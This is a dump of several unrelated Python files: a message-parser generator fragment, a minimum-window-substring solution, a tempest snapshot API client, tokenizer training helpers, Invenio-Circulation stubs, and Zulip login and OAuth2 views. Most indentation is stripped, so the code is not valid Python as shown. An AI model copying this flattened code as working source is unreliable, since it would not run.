raise ValueError('TLV messages cannot have optional fields {}.{}\n at {}:{}'
.format(tokens[2], tokens[3], ln, line))
tlv = master.find_tlv(tokens[1])
if not tlv:
raise ValueError('tlvdata for unknown tlv {}.\nat {}:{}'
.format(tokens[1], ln, line))
msg = tlv.find_message(tokens[2])
if not msg:
raise ValueError('tlvdata for unknown tlv-message {}.\nat {}:{}'
.format(tokens[2], ln, line))
if collapse:
count = 1
else:
count = tokens[5]
msg.add_data_field(tokens[3], type_obj, count, comments=list(comment_set),
optional=optional, implicit_len_ok=True)
comment_set = []
elif token_type == 'msgtype':
master.add_message(tokens[1:], comments=list(comment_set))
comment_set = []
elif token_type == 'msgdata':
msg = master.find_message(tokens[1])
if not msg:
raise ValueError('Unknown message type {}. {}:{}'.format(tokens[1], ln, line))
type_obj, collapse, optional = master.add_type(tokens[3], tokens[2], tokens[1])
if collapse:
count = 1
else:
count = tokens[4]
# if this is an 'extension' field*, we want to add a new 'message' type
# in the future, extensions will be handled as TLV's
#
# *(in the spec they're called 'optional', but that term is overloaded
# in that internal wire messages have 'optional' fields that are treated
# differently. for the sake of clarity here, for bolt-wire messages,
# we'll refer to 'optional' message fields as 'extensions')
#
if tokens[5:] == []:
msg.add_data_field(tokens[2], type_obj, count, comments=list(comment_set),
optional=optional)
else: # is one or more extension fields
if optional:
raise ValueError("Extension fields cannot be optional. {}:{}"
.format(ln, line))
orig_msg = msg
for extension in tokens[5:]:
extension_name = "{}_{}".format(tokens[1], extension)
msg = master.find_message(extension_name)
if not msg:
msg = copy.deepcopy(orig_msg)
msg.enumname = msg.name
msg.name = extension_name
master.add_extension_msg(msg.name, msg)
msg.add_data_field(tokens[2], type_obj, count, comments=list(comment_set), optional=optional)
# If this is a print_wire page, add the extension fields to the
# original message, so we can print them if present.
if options.print_wire:
orig_msg.add_data_field(tokens[2], type_obj, count=count,
extensions=tokens[5:],
comments=list(comment_set),
optional=optional)
comment_set = []
elif token_type.startswith('#include'):
master.add_include(token_type)
elif token_type.startswith('#'):
comment_set.append(token_type[1:])
else:
raise ValueError("Unknown token type {} on line {}:{}".format(token_type, ln, line))
except StopIteration:
pass
master.post_process()
master.write(options, output)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-s", "--expose-subtypes", help="print subtypes in header",
action="store_true", default=False)
parser.add_argument("-P", "--print_wire", help="generate wire printing source files",
action="store_true", default=False)
parser.add_argument("--page", choices=['header', 'impl'], help="page to print")
parser.add_argument('--expose-tlv-type', action='append', default=[])
parser.add_argument('header_filename', help='The filename of the header')
parser.add_argument('enum_name', help='The name of the enum to produce')
parser.add_argument("files", help='Files to read in (or stdin)', nargs=REMAINDER)
parsed_args = parser.parse_args()
main(parsed_args, parsed_args.files)
|
py | 1a34894c130390282c48bad70601198b82112381 | class Solution(object):
def minWindow(self, s, t):
"""
:type s: str
:type t: str
:rtype: str
"""
new_t = {}
for char in t:
if char in new_t:
new_t[char] += 1
else:
new_t[char] = 1
new_s = []
for i, char in enumerate(s):
if char in new_t:
new_s.append([i, char])
window = {}
formed = 0
left = 0
res = [float('inf'), 0, 0]
for right in range(len(new_s)):
char = new_s[right][1]
if char in window:
window[char] += 1
else:
window[char] = 1
if window[char] == new_t[char] :
formed += 1
while formed == len(new_t) and left <= right:
char = new_s[left][1]
start = new_s[left][0]
end = new_s[right][0]
if end-start+1 < res[0]:
res[0] = end-start+1
res[1] = start
res[2] = end
window[char] -= 1
left += 1
if window[char] < new_t[char]:
formed -= 1
return '' if res[0] == float('inf') else s[res[1]:res[2]+1]
sol = Solution()
s1 = 'ADOBECODEBANC'
t1 = 'ABC'
ans1 = sol.minWindow(s1, t1)
print(ans1)
|
py | 1a34898f957c5cbbc38e750e6e3502bac358db59 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import time
import urllib
from tempest.common.rest_client import RestClient
from tempest import exceptions
from tempest.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class SnapshotsClientJSON(RestClient):
"""Client class to send CRUD Volume API requests."""
def __init__(self, config, username, password, auth_url, tenant_name=None):
super(SnapshotsClientJSON, self).__init__(config, username, password,
auth_url, tenant_name)
self.service = self.config.volume.catalog_type
self.build_interval = self.config.volume.build_interval
self.build_timeout = self.config.volume.build_timeout
def list_snapshots(self, params=None):
"""List all the snapshot."""
url = 'snapshots'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
return resp, body['snapshots']
def list_snapshots_with_detail(self, params=None):
"""List the details of all snapshots."""
url = 'snapshots/detail'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
return resp, body['snapshots']
def get_snapshot(self, snapshot_id):
"""Returns the details of a single snapshot."""
url = "snapshots/%s" % str(snapshot_id)
resp, body = self.get(url)
body = json.loads(body)
return resp, body['snapshot']
def create_snapshot(self, volume_id, **kwargs):
"""
Creates a new snapshot.
volume_id(Required): id of the volume.
force: Create a snapshot even if the volume attached (Default=False)
display_name: Optional snapshot Name.
display_description: User friendly snapshot description.
"""
post_body = {'volume_id': volume_id}
post_body.update(kwargs)
post_body = json.dumps({'snapshot': post_body})
resp, body = self.post('snapshots', post_body, self.headers)
body = json.loads(body)
return resp, body['snapshot']
def update_snapshot(self, snapshot_id, **kwargs):
"""Updates a snapshot."""
put_body = json.dumps({'snapshot': kwargs})
resp, body = self.put('snapshots/%s' % snapshot_id, put_body,
self.headers)
body = json.loads(body)
return resp, body['snapshot']
# NOTE(afazekas): just for the wait function
def _get_snapshot_status(self, snapshot_id):
resp, body = self.get_snapshot(snapshot_id)
status = body['status']
# NOTE(afazekas): snapshot can reach an "error"
# state in a "normal" lifecycle
if (status == 'error'):
raise exceptions.SnapshotBuildErrorException(
snapshot_id=snapshot_id)
return status
    # NOTE(afazekas): Wait reinvented again. It is not in the correct layer
def wait_for_snapshot_status(self, snapshot_id, status):
"""Waits for a Snapshot to reach a given status."""
start_time = time.time()
old_value = value = self._get_snapshot_status(snapshot_id)
while True:
dtime = time.time() - start_time
time.sleep(self.build_interval)
if value != old_value:
LOG.info('Value transition from "%s" to "%s"'
'in %d second(s).', old_value,
value, dtime)
if (value == status):
return value
if dtime > self.build_timeout:
message = ('Time Limit Exceeded! (%ds)'
'while waiting for %s, '
'but we got %s.' %
(self.build_timeout, status, value))
raise exceptions.TimeoutException(message)
time.sleep(self.build_interval)
old_value = value
value = self._get_snapshot_status(snapshot_id)
def delete_snapshot(self, snapshot_id):
"""Delete Snapshot."""
return self.delete("snapshots/%s" % str(snapshot_id))
def is_resource_deleted(self, id):
try:
self.get_snapshot(id)
except exceptions.NotFound:
return True
return False
def reset_snapshot_status(self, snapshot_id, status):
"""Reset the specified snapshot's status."""
post_body = json.dumps({'os-reset_status': {"status": status}})
resp, body = self.post('snapshots/%s/action' % snapshot_id, post_body,
self.headers)
return resp, body
def update_snapshot_status(self, snapshot_id, status, progress):
"""Update the specified snapshot's status."""
post_body = {
'status': status,
'progress': progress
}
post_body = json.dumps({'os-update_snapshot_status': post_body})
url = 'snapshots/%s/action' % str(snapshot_id)
resp, body = self.post(url, post_body, self.headers)
return resp, body
def create_snapshot_metadata(self, snapshot_id, metadata):
"""Create metadata for the snapshot."""
put_body = json.dumps({'metadata': metadata})
url = "snapshots/%s/metadata" % str(snapshot_id)
resp, body = self.post(url, put_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def get_snapshot_metadata(self, snapshot_id):
"""Get metadata of the snapshot."""
url = "snapshots/%s/metadata" % str(snapshot_id)
resp, body = self.get(url, self.headers)
body = json.loads(body)
return resp, body['metadata']
def update_snapshot_metadata(self, snapshot_id, metadata):
"""Update metadata for the snapshot."""
put_body = json.dumps({'metadata': metadata})
url = "snapshots/%s/metadata" % str(snapshot_id)
resp, body = self.put(url, put_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def update_snapshot_metadata_item(self, snapshot_id, id, meta_item):
"""Update metadata item for the snapshot."""
put_body = json.dumps({'meta': meta_item})
url = "snapshots/%s/metadata/%s" % (str(snapshot_id), str(id))
resp, body = self.put(url, put_body, self.headers)
body = json.loads(body)
return resp, body['meta']
def delete_snapshot_metadata_item(self, snapshot_id, id):
"""Delete metadata item for the snapshot."""
url = "snapshots/%s/metadata/%s" % (str(snapshot_id), str(id))
resp, body = self.delete(url, self.headers)
return resp, body
|
py | 1a348a49900dd056d743b15b33cc3c9fb614b52b | import sys
import os
sys.path.append(os.getcwd())
import torch
import tokenizers
import sklearn
from tokenizers import SentencePieceBPETokenizer
from tokenizers import SentencePieceUnigramTokenizer
from tokenizers import BertWordPieceTokenizer
from tokenizers import Tokenizer
from tokenizers.models import WordPiece
from tokenizers.trainers import WordPieceTrainer, BpeTrainer, UnigramTrainer
# whitespace pretokenizer ?
from tokenizers.pre_tokenizers import Whitespace
# use bert pretokenizer
from typing import List
unk_token = "<UNK>"
spl_tokens = ["<UNK>", "<SEP>", "<MASK>", "<CLS>"]
def is_filepath_list(filelist: List[str]) -> bool:
"""
    Return True if every path in the list is an existing file.
"""
for file in filelist:
if not os.path.isfile(file):
return False
return True
def train_iterator_mul_files(files):
for path in files:
with open(path, "r") as f:
for line in f:
yield line
def train_WordPieceTokenizer(file_list: List[str], vocab_size=30_000, min_frequency=5, limit_alphabet=500,
save: bool = True):
"""
Train WP tokenizer from a list of files.
"""
tokenizer = Tokenizer(WordPiece(unk_token=unk_token))
trainer = WordPieceTrainer(
vocab_size=vocab_size,
min_frequency=min_frequency,
special_tokens=spl_tokens,
show_progress=True,
limit_alphabet=limit_alphabet
)
tokenizer.pre_tokenizer = Whitespace()
if is_filepath_list(file_list):
tokenizer.train(file_list, trainer=trainer)
else:
        tokenizer.train_from_iterator(file_list, trainer=trainer)
if save:
tokenizer.save("./WP_tok-trained.json")
tokenizer = Tokenizer.from_file("./WP_tok-trained.json")
return tokenizer
def train_SentencePieceBPETokenizer(files: List[str], vocab_size=30_000, min_frequency=5, limit_alphabet=500,
save: bool = True):
"""
    Train SP_BPE tokenizer from a list of files.
"""
if is_filepath_list(files):
train_it = train_iterator_mul_files(files)
else:
train_it = files
tokenizer = SentencePieceBPETokenizer()
tokenizer.train_from_iterator(
train_it,
vocab_size=vocab_size,
min_frequency=min_frequency,
show_progress=True,
limit_alphabet=limit_alphabet,
)
if save:
tokenizer.save("./SP_BPE_tok-trained.json")
tokenizer = Tokenizer.from_file("./SP_BPE_tok-trained.json")
return tokenizer
def train_SentencePieceUGTokenizer(filelist: List[str], vocab_size=30_000, save: bool = True):
"""
    Train SP_UG tokenizer from a list of files.
"""
if is_filepath_list(filelist):
train_it = train_iterator_mul_files(filelist)
else:
train_it = filelist
tokenizer = SentencePieceUnigramTokenizer()
tokenizer.train_from_iterator(
train_it,
vocab_size=vocab_size,
show_progress=True
)
if save:
tokenizer.save("./SP_UG_tok-trained.json")
tokenizer = Tokenizer.from_file("./SP_UG_tok-trained.json")
return tokenizer
def train_BertWordPieceTokenizer(filelist: List[str], vocab_size=30_000, min_frequency=5, limit_alphabet=500,
save: bool = True):
"""
    Train BERT tokenizer from a list of files.
"""
if is_filepath_list(filelist):
train_it = train_iterator_mul_files(filelist)
else:
train_it = filelist
tokenizer = BertWordPieceTokenizer()
tokenizer.normalizer = tokenizers.normalizers.BertNormalizer(strip_accents=True, lowercase=True)
tokenizer.train_from_iterator(
train_it,
vocab_size=vocab_size,
show_progress=True,
min_frequency=min_frequency,
limit_alphabet=limit_alphabet,
)
if save:
tokenizer.save("./BERT_tok-trained.json")
tokenizer = Tokenizer.from_file("./BERT_tok-trained.json")
return tokenizer
def get_vocab_from_tokenizer(tokenizer: Tokenizer):
"""
Get vocab from tokenizer.
"""
vocab = tokenizer.get_vocab()
return vocab
if __name__ == '__main__':
# create corpus
print(os.getcwd())
corpus = os.listdir(".corpus_caches/orcas/medium")
corpus = [".corpus_caches/orcas/medium/" + file for file in corpus]
tokenizer = train_BertWordPieceTokenizer(corpus, vocab_size=30_000)
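    # Rough follow-up sketch (token output is illustrative, not precomputed):
    #   encoding = tokenizer.encode("deep learning for information retrieval")
    #   print(encoding.tokens)   # subword pieces from the trained vocabulary
    #   print(encoding.ids)      # corresponding vocabulary ids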
|
py | 1a348a5267e91d3f3720e89c7cc5d7778794cc3d | # -*- coding: utf-8 -*-
#
# Copyright (C) 2018-2020 CERN.
# Copyright (C) 2018-2020 RERO.
#
# Invenio-Circulation is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Circulation API."""
import arrow
from .errors import NotImplementedConfigurationError
def patron_exists(patron_pid):
"""Return True if patron exists, False otherwise."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_PATRON_EXISTS"
)
def item_exists(item_pid):
"""Return True if item exists, False otherwise.
:param item_pid: a dict containing `value` and `type` fields to
uniquely identify the item.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_ITEM_EXISTS"
)
def document_exists(document_pid):
"""Return True if document exists, False otherwise."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_DOCUMENT_EXISTS"
)
# NOTE: Its on purpose `ref` and not `$ref` so it doesn't try to resolve
def item_ref_builder(loan_pid, loan):
"""Return the $ref for item_pid."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_ITEM_REF_BUILDER"
)
# NOTE: Its on purpose `ref` and not `$ref` so it doesn't try to resolve
def patron_ref_builder(patron_pid, loan):
"""Return the $ref for patron_pid."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_PATRON_REF_BUILDER"
)
# NOTE: Its on purpose `ref` and not `$ref` so it doesn't try to resolve
def document_ref_builder(document_pid, loan):
"""Return the $ref for document_pid."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_DOCUMENT_REF_BUILDER"
)
def item_location_retriever(item_pid):
"""Retrieve the location pid of the passed item pid.
:param item_pid: a dict containing `value` and `type` fields to
uniquely identify the item.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_ITEM_LOCATION_RETRIEVER"
)
def item_can_circulate(item_pid):
"""Return if item is available for checkout.
:param item_pid: a dict containing `value` and `type` fields to
uniquely identify the item.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.checkout.item_can_circulate"
)
def can_be_requested(loan):
"""Should return True if document or item can be requested."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.request.can_be_requested"
)
def get_default_loan_duration(loan, initial_loan):
"""Return a default loan duration in timedelta.
:param loan: the current loan to extend, updated with transition params
:param initial_loan: the loan before applying transition params
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.checkout.duration_default"
)
def is_loan_duration_valid(loan):
"""Validate the loan duration."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.checkout.duration_validate"
)
def get_default_extension_duration(loan, initial_loan):
"""Return a default extension duration in timedelta.
:param loan: the current loan to extend, updated with transition params
:param initial_loan: the loan before applying transition params
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.extension.duration_default"
)
def get_default_extension_max_count(loan):
"""Return a default extensions max count."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.extension.max_count"
)
def transaction_location_validator(transaction_location_pid):
"""Validate that the given transaction location PID is valid.
:param transaction_location_pid: the transaction location PID sent with
the REST request.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_TRANSACTION_LOCATION_VALIDATOR"
)
def transaction_user_validator(transaction_user_pid):
"""Validate that the given transaction user PID is valid.
:param transaction_user_pid: the transaction user PID sent with
the REST request.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_TRANSACTION_USER_VALIDATOR"
)
def str2datetime(str_date):
"""Parse string date with timezone and return a datetime object."""
return arrow.get(str_date).to('utc')
def validate_item_pickup_transaction_locations(loan, destination, **kwargs):
"""Validate the loan item, pickup and transaction locations.
This also allow for extra validation if needed at the library level.
:param loan: the loan
:param destination: the destination of the loan
:return: False if validation is not possible, otherwise True
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_LOAN_LOCATIONS_VALIDATION"
)
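# Hedged configuration sketch: an application overrides the CIRCULATION_* variables
# named in the errors above with its own callables (function names here are hypothetical):
#
#   CIRCULATION_ITEM_EXISTS = my_item_exists
#   CIRCULATION_PATRON_EXISTS = my_patron_exists
#   CIRCULATION_POLICIES = {
#       'checkout': {'item_can_circulate': my_item_can_circulate, ...},
#   }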
|
py | 1a348b90731e382312e271a6ca5944eb4dc96c71 |
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
from django.contrib.auth import authenticate, get_backends
from django.contrib.auth.views import login as django_login_page, \
logout_then_login as django_logout_then_login
from django.contrib.auth.views import password_reset as django_password_reset
from django.urls import reverse
from zerver.decorator import authenticated_json_post_view, require_post, \
process_client, do_login, log_view_func
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect, \
HttpResponseNotFound
from django.middleware.csrf import get_token
from django.shortcuts import redirect, render
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_GET
from django.utils.translation import ugettext as _
from django.utils.http import is_safe_url
from django.core import signing
import urllib
from typing import Any, Dict, List, Optional, Tuple, Text
from confirmation.models import Confirmation, create_confirmation_link
from zerver.context_processors import zulip_default_context, get_realm_from_request
from zerver.forms import HomepageForm, OurAuthenticationForm, \
WRONG_SUBDOMAIN_ERROR, ZulipPasswordResetForm
from zerver.lib.mobile_auth_otp import is_valid_otp, otp_encrypt_api_key
from zerver.lib.push_notifications import push_notifications_enabled
from zerver.lib.request import REQ, has_request_variables, JsonableError
from zerver.lib.response import json_success, json_error
from zerver.lib.subdomains import get_subdomain, is_subdomain_root_or_alias
from zerver.lib.validator import validate_login_email
from zerver.models import PreregistrationUser, UserProfile, remote_user_to_email, Realm, \
get_realm
from zerver.signals import email_on_new_login
from zproject.backends import password_auth_enabled, dev_auth_enabled, \
github_auth_enabled, google_auth_enabled, ldap_auth_enabled, \
ZulipLDAPConfigurationError, ZulipLDAPAuthBackend, email_auth_enabled, \
remote_auth_enabled
from version import ZULIP_VERSION
import hashlib
import hmac
import jwt
import logging
import requests
import time
import ujson
def get_safe_redirect_to(url: Text, redirect_host: Text) -> Text:
is_url_safe = is_safe_url(url=url, host=redirect_host)
if is_url_safe:
return urllib.parse.urljoin(redirect_host, url)
else:
return redirect_host
def create_preregistration_user(email: Text, request: HttpRequest, realm_creation: bool=False,
password_required: bool=True) -> HttpResponse:
realm = None
if not realm_creation:
realm = get_realm(get_subdomain(request))
return PreregistrationUser.objects.create(email=email,
realm_creation=realm_creation,
password_required=password_required,
realm=realm)
def maybe_send_to_registration(request: HttpRequest, email: Text, full_name: Text='',
password_required: bool=True) -> HttpResponse:
realm = get_realm_from_request(request)
from_multiuse_invite = False
multiuse_obj = None
streams_to_subscribe = None
multiuse_object_key = request.session.get("multiuse_object_key", None)
if multiuse_object_key is not None:
from_multiuse_invite = True
multiuse_obj = Confirmation.objects.get(confirmation_key=multiuse_object_key).content_object
realm = multiuse_obj.realm
streams_to_subscribe = multiuse_obj.streams.all()
form = HomepageForm({'email': email}, realm=realm, from_multiuse_invite=from_multiuse_invite)
request.verified_email = None
if form.is_valid():
# Construct a PreregistrationUser object and send the user over to
# the confirmation view.
prereg_user = None
if settings.ONLY_SSO:
try:
prereg_user = PreregistrationUser.objects.filter(
email__iexact=email, realm=realm).latest("invited_at")
except PreregistrationUser.DoesNotExist:
prereg_user = create_preregistration_user(email, request,
password_required=password_required)
else:
prereg_user = create_preregistration_user(email, request,
password_required=password_required)
if multiuse_object_key is not None:
del request.session["multiuse_object_key"]
request.session.modified = True
if streams_to_subscribe is not None:
prereg_user.streams.set(streams_to_subscribe)
return redirect("".join((
create_confirmation_link(prereg_user, request.get_host(), Confirmation.USER_REGISTRATION),
'?full_name=',
            # urllib does not handle Unicode, so coerce to an encoded byte string
# Explanation: http://stackoverflow.com/a/5605354/90777
urllib.parse.quote_plus(full_name.encode('utf8')))))
else:
url = reverse('register')
return render(request,
'zerver/accounts_home.html',
context={'form': form, 'current_url': lambda: url,
'from_multiuse_invite': from_multiuse_invite},
)
def redirect_to_subdomain_login_url() -> HttpResponseRedirect:
login_url = reverse('django.contrib.auth.views.login')
redirect_url = login_url + '?subdomain=1'
return HttpResponseRedirect(redirect_url)
def redirect_to_config_error(error_type: str) -> HttpResponseRedirect:
return HttpResponseRedirect("/config-error/%s" % (error_type,))
def login_or_register_remote_user(request: HttpRequest, remote_username: Optional[Text],
user_profile: Optional[UserProfile], full_name: Text='',
invalid_subdomain: bool=False, mobile_flow_otp: Optional[str]=None,
is_signup: bool=False,
redirect_to: Text='') -> HttpResponse:
if user_profile is None or user_profile.is_mirror_dummy:
# Since execution has reached here, we have verified the user
# controls an email address (remote_username) but there's no
# associated Zulip user account.
if is_signup:
# If they're trying to sign up, send them over to the PreregistrationUser flow.
return maybe_send_to_registration(request, remote_user_to_email(remote_username),
full_name, password_required=False)
# Otherwise, we send them to a special page that asks if they
# want to register or provided the wrong email and want to go back.
try:
validate_email(remote_username)
invalid_email = False
except ValidationError:
# If email address is invalid, we can't send the user
# PreregistrationUser flow.
invalid_email = True
context = {'full_name': full_name,
'email': remote_username,
'invalid_email': invalid_email}
return render(request,
'zerver/confirm_continue_registration.html',
context=context)
if invalid_subdomain:
# Show login page with an error message
return redirect_to_subdomain_login_url()
if mobile_flow_otp is not None:
# For the mobile Oauth flow, we send the API key and other
# necessary details in a redirect to a zulip:// URI scheme.
params = {
'otp_encrypted_api_key': otp_encrypt_api_key(user_profile, mobile_flow_otp),
'email': remote_username,
'realm': user_profile.realm.uri,
}
# We can't use HttpResponseRedirect, since it only allows HTTP(S) URLs
response = HttpResponse(status=302)
response['Location'] = 'zulip://login?' + urllib.parse.urlencode(params)
# Maybe sending 'user_logged_in' signal is the better approach:
# user_logged_in.send(sender=user_profile.__class__, request=request, user=user_profile)
# Not doing this only because over here we don't add the user information
# in the session. If the signal receiver assumes that we do then that
# would cause problems.
email_on_new_login(sender=user_profile.__class__, request=request, user=user_profile)
# Mark this request as having a logged-in user for our server logs.
process_client(request, user_profile)
request._email = user_profile.email
return response
do_login(request, user_profile)
redirect_to = get_safe_redirect_to(redirect_to, user_profile.realm.uri)
return HttpResponseRedirect(redirect_to)
@log_view_func
@has_request_variables
def remote_user_sso(request: HttpRequest,
mobile_flow_otp: Optional[str]=REQ(default=None)) -> HttpResponse:
try:
remote_user = request.META["REMOTE_USER"]
except KeyError:
# TODO: Arguably the JsonableError values here should be
# full-page HTML configuration errors instead.
raise JsonableError(_("No REMOTE_USER set."))
# Django invokes authenticate methods by matching arguments, and this
# authentication flow will not invoke LDAP authentication because of
# this condition of Django so no need to check if LDAP backend is
# enabled.
validate_login_email(remote_user_to_email(remote_user))
# Here we support the mobile flow for REMOTE_USER_BACKEND; we
# validate the data format and then pass it through to
# login_or_register_remote_user if appropriate.
if mobile_flow_otp is not None:
if not is_valid_otp(mobile_flow_otp):
raise JsonableError(_("Invalid OTP"))
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
# Since RemoteUserBackend will return None if Realm is None, we
# don't need to check whether `get_realm` returned None.
user_profile = authenticate(remote_user=remote_user, realm=realm)
redirect_to = request.GET.get('next', '')
return login_or_register_remote_user(request, remote_user, user_profile,
mobile_flow_otp=mobile_flow_otp,
redirect_to=redirect_to)
@csrf_exempt
@log_view_func
def remote_user_jwt(request: HttpRequest) -> HttpResponse:
subdomain = get_subdomain(request)
try:
auth_key = settings.JWT_AUTH_KEYS[subdomain]
except KeyError:
raise JsonableError(_("Auth key for this subdomain not found."))
try:
json_web_token = request.POST["json_web_token"]
options = {'verify_signature': True}
payload = jwt.decode(json_web_token, auth_key, options=options)
except KeyError:
raise JsonableError(_("No JSON web token passed in request"))
except jwt.InvalidTokenError:
raise JsonableError(_("Bad JSON web token"))
remote_user = payload.get("user", None)
if remote_user is None:
raise JsonableError(_("No user specified in JSON web token claims"))
email_domain = payload.get('realm', None)
if email_domain is None:
raise JsonableError(_("No organization specified in JSON web token claims"))
email = "%s@%s" % (remote_user, email_domain)
realm = get_realm(subdomain)
if realm is None:
raise JsonableError(_("Wrong subdomain"))
try:
# We do all the authentication we need here (otherwise we'd have to
# duplicate work), but we need to call authenticate with some backend so
# that the request.backend attribute gets set.
return_data = {} # type: Dict[str, bool]
user_profile = authenticate(username=email,
realm=realm,
return_data=return_data,
use_dummy_backend=True)
except UserProfile.DoesNotExist:
user_profile = None
return login_or_register_remote_user(request, email, user_profile, remote_user)
def google_oauth2_csrf(request: HttpRequest, value: str) -> str:
# In Django 1.10, get_token returns a salted token which changes
# every time get_token is called.
from django.middleware.csrf import _unsalt_cipher_token
token = _unsalt_cipher_token(get_token(request))
return hmac.new(token.encode('utf-8'), value.encode("utf-8"), hashlib.sha256).hexdigest()
def reverse_on_root(viewname: str, args: List[str]=None, kwargs: Dict[str, str]=None) -> str:
return settings.ROOT_DOMAIN_URI + reverse(viewname, args=args, kwargs=kwargs)
def oauth_redirect_to_root(request: HttpRequest, url: Text, is_signup: bool=False) -> HttpResponse:
main_site_uri = settings.ROOT_DOMAIN_URI + url
params = {
'subdomain': get_subdomain(request),
'is_signup': '1' if is_signup else '0',
}
# mobile_flow_otp is a one-time pad provided by the app that we
# can use to encrypt the API key when passing back to the app.
mobile_flow_otp = request.GET.get('mobile_flow_otp')
if mobile_flow_otp is not None:
if not is_valid_otp(mobile_flow_otp):
raise JsonableError(_("Invalid OTP"))
params['mobile_flow_otp'] = mobile_flow_otp
next = request.GET.get('next')
if next:
params['next'] = next
return redirect(main_site_uri + '?' + urllib.parse.urlencode(params))
def start_google_oauth2(request: HttpRequest) -> HttpResponse:
url = reverse('zerver.views.auth.send_oauth_request_to_google')
if not (settings.GOOGLE_OAUTH2_CLIENT_ID and settings.GOOGLE_OAUTH2_CLIENT_SECRET):
return redirect_to_config_error("google")
is_signup = bool(request.GET.get('is_signup'))
return oauth_redirect_to_root(request, url, is_signup=is_signup)
def start_social_login(request: HttpRequest, backend: Text) -> HttpResponse:
backend_url = reverse('social:begin', args=[backend])
if (backend == "github") and not (settings.SOCIAL_AUTH_GITHUB_KEY and
settings.SOCIAL_AUTH_GITHUB_SECRET):
return redirect_to_config_error("github")
return oauth_redirect_to_root(request, backend_url)
def start_social_signup(request: HttpRequest, backend: Text) -> HttpResponse:
backend_url = reverse('social:begin', args=[backend])
return oauth_redirect_to_root(request, backend_url, is_signup=True)
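
# Builds the Google authorization URL.  The `state` parameter has the form
# cur_time:subdomain:mobile_flow_otp:is_signup:next:hmac, where the trailing
# hmac is computed by google_oauth2_csrf over the other fields.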
def send_oauth_request_to_google(request: HttpRequest) -> HttpResponse:
subdomain = request.GET.get('subdomain', '')
is_signup = request.GET.get('is_signup', '')
next = request.GET.get('next', '')
mobile_flow_otp = request.GET.get('mobile_flow_otp', '0')
if ((settings.ROOT_DOMAIN_LANDING_PAGE and subdomain == '') or
not Realm.objects.filter(string_id=subdomain).exists()):
return redirect_to_subdomain_login_url()
google_uri = 'https://accounts.google.com/o/oauth2/auth?'
cur_time = str(int(time.time()))
csrf_state = '%s:%s:%s:%s:%s' % (cur_time, subdomain, mobile_flow_otp, is_signup, next)
# Now compute the CSRF hash with the other parameters as an input
csrf_state += ":%s" % (google_oauth2_csrf(request, csrf_state),)
params = {
'response_type': 'code',
'client_id': settings.GOOGLE_OAUTH2_CLIENT_ID,
'redirect_uri': reverse_on_root('zerver.views.auth.finish_google_oauth2'),
'scope': 'profile email',
'state': csrf_state,
}
return redirect(google_uri + urllib.parse.urlencode(params))
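
# Callback for the Google OAuth2 flow: verify the CSRF state, exchange the
# authorization code for an access token, fetch the user's name and "account"
# email from the Google+ people API, and then either log into the target
# subdomain or hand the data off to the signup flow.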
@log_view_func
def finish_google_oauth2(request: HttpRequest) -> HttpResponse:
error = request.GET.get('error')
if error == 'access_denied':
return redirect('/')
elif error is not None:
logging.warning('Error from google oauth2 login: %s' % (request.GET.get("error"),))
return HttpResponse(status=400)
csrf_state = request.GET.get('state')
if csrf_state is None or len(csrf_state.split(':')) != 6:
logging.warning('Missing Google oauth2 CSRF state')
return HttpResponse(status=400)
(csrf_data, hmac_value) = csrf_state.rsplit(':', 1)
if hmac_value != google_oauth2_csrf(request, csrf_data):
logging.warning('Google oauth2 CSRF error')
return HttpResponse(status=400)
cur_time, subdomain, mobile_flow_otp, is_signup, next = csrf_data.split(':')
if mobile_flow_otp == '0':
mobile_flow_otp = None
is_signup = bool(is_signup == '1')
resp = requests.post(
'https://www.googleapis.com/oauth2/v3/token',
data={
'code': request.GET.get('code'),
'client_id': settings.GOOGLE_OAUTH2_CLIENT_ID,
'client_secret': settings.GOOGLE_OAUTH2_CLIENT_SECRET,
'redirect_uri': reverse_on_root('zerver.views.auth.finish_google_oauth2'),
'grant_type': 'authorization_code',
},
)
if resp.status_code == 400:
logging.warning('User error converting Google oauth2 login to token: %s' % (resp.text,))
return HttpResponse(status=400)
elif resp.status_code != 200:
logging.error('Could not convert google oauth2 code to access_token: %s' % (resp.text,))
return HttpResponse(status=400)
access_token = resp.json()['access_token']
resp = requests.get(
'https://www.googleapis.com/plus/v1/people/me',
params={'access_token': access_token}
)
if resp.status_code == 400:
logging.warning('Google login failed making info API call: %s' % (resp.text,))
return HttpResponse(status=400)
elif resp.status_code != 200:
logging.error('Google login failed making API call: %s' % (resp.text,))
return HttpResponse(status=400)
body = resp.json()
